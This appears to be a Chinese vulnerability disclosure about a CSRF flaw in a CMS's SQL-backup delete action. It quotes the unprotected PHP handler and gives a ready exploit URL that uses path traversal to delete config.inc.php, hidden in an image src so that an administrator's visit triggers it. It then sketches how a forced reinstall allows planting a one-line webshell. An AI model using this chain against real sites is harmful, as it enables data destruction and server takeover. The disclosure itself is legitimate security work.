### 简要描述:
Get形式的CSRF,任意处插入url,管理员浏览后克删除任意文件。
### 详细说明:
/app/system/action/sql.php
```
case "delete":
$sql = tsFilter($_GET['sql']);
rmrf('data/baksql/'.$sql);
qiMsg('删除成功!如果有其他卷文件请一同删除!');
break;
```
delete参数以get方式传递。并未加token判断,导致CSRF。
欺骗管理员访问(或将该url以图片的src属性插入任意页面,管理员查看即可触发)http://xxxx/index.php?app=system&ac=sql&ts=delete&sql=../../data/config.inc.php
即可删除配置文件,导致重装系统。安装时在安装文件处插入一句话即可getshell。
### 漏洞证明:
见详细说明。
暂无评论